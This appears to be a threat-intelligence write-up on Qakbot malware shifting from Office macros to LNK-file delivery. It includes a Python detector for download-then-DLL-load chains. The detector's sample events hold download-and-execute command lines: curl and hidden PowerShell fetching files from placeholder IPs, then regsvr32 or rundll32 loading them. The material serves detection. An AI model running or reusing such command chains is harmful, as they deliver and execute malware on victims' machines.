The operators of the Qakbot malware have been observed transforming their delivery vectors in an attempt to evade detection. Qakbot has been a recurring threat since late 2007, evolving from its initial purpose as a banking trojan to a more sophisticated and modular information stealer capable of deploying next-stage payloads such as ransomware.
In early 2022, Qakbot was delivered via Excel 4.0 (XLM) macros embedded in malicious Microsoft Office documents. These documents arrived in phishing emails whose subjects and bodies commonly used finance and business-operations keywords to entice the recipient into opening and executing them. Over the past few months, however, Qakbot has instead used Windows shortcut (LNK) files as the delivery method. This shift is likely a response to Microsoft’s decision to block macro execution in Office documents. The latest LNK payloads also vary the process that executes the main Qakbot DLL, sometimes using rundll32.exe instead of regsvr32.exe. The download stage differs between recent variants as well: some use powershell.exe to download and execute the main DLL payload, while others use a combination of cmd.exe and curl.exe to download the file and then execute it.
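The two execution chains described above (curl.exe or powershell.exe downloading a file, then regsvr32.exe or rundll32.exe loading it from a user-writable path) can be correlated in process-creation telemetry. The following is an added example written for this page, not code from the original article or from any vendor; the Sysmon-style events, hostnames, paths and IP addresses are constructed, and the heuristics (URL in the downloader's command line, DLL loaded from a user-writable directory, same file on the same host within five minutes) are assumptions, not a published detection rule.

```python
import re
from datetime import datetime, timedelta

WIN_PATH = re.compile(r"[A-Za-z]:\\[^\s,\"']+")
URL = re.compile(r"https?://\S+", re.I)
DOWNLOADERS = {"curl.exe", "powershell.exe"}   # download stages seen in the LNK variants
LOADERS = {"regsvr32.exe", "rundll32.exe"}      # processes used to execute the Qakbot DLL
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")

def user_writable(path):
    p = path.lower()
    return p.startswith(USER_WRITABLE) or "\\temp\\" in p

def stage(ev):
    """Classify one event as ('download', path), ('load', path) or None."""
    img, cmd = ev["image"].lower(), ev["cmdline"]
    paths = [p for p in WIN_PATH.findall(cmd) if not p.lower().endswith(img)]
    if img in DOWNLOADERS and URL.search(cmd) and paths:
        return ("download", paths[-1])          # output file is the last path argument
    if img in LOADERS and paths and user_writable(paths[0]):
        return ("load", paths[0])               # DLL loaded from a user-writable location
    return None

def correlate(events, window=timedelta(minutes=5)):
    """Pair each suspicious DLL load with a prior download of the same file on the same host."""
    downloads, hits = {}, []
    for ev in sorted(events, key=lambda e: e["ts"]):
        s = stage(ev)
        if not s:
            continue
        ts = datetime.fromisoformat(ev["ts"])
        key = (ev["host"], s[1].lower())
        if s[0] == "download":
            downloads[key] = (ts, ev["image"])
        elif key in downloads and ts - downloads[key][0] <= window:
            hits.append((ev["host"], downloads[key][1], ev["image"], s[1]))
    return hits

# Constructed sample events (hypothetical hosts, paths and documentation-range IPs).
EVENTS = [
    {"ts": "2022-08-01T10:00:01", "host": "WS01", "parent": "cmd.exe", "image": "curl.exe",
     "cmdline": "curl.exe http://203.0.113.5/img.png -o C:\\Users\\Public\\p.dat"},
    {"ts": "2022-08-01T10:00:04", "host": "WS01", "parent": "cmd.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s C:\\Users\\Public\\p.dat"},
    {"ts": "2022-08-01T10:02:10", "host": "WS02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"Invoke-WebRequest http://198.51.100.7/x -OutFile C:\\ProgramData\\q.dll\""},
    {"ts": "2022-08-01T10:02:12", "host": "WS02", "parent": "powershell.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\ProgramData\\q.dll,DllMain"},
    {"ts": "2022-08-01T10:03:00", "host": "WS03", "parent": "msiexec.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s C:\\Windows\\System32\\foo.dll"},   # benign: System32 path
]

if __name__ == "__main__":
    for hit in correlate(EVENTS):
        print("host=%s download=%s loader=%s file=%s" % hit)
```

The benign System32 registration on WS03 is not reported; only the two download-then-load chains are.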
These varying methodologies are a clear sign of Qakbot evolving not only to evade security practices and defenses, but also to adapt to major changes in the environments it targets. It is likely that Qakbot, and other malware families, will continue to adapt.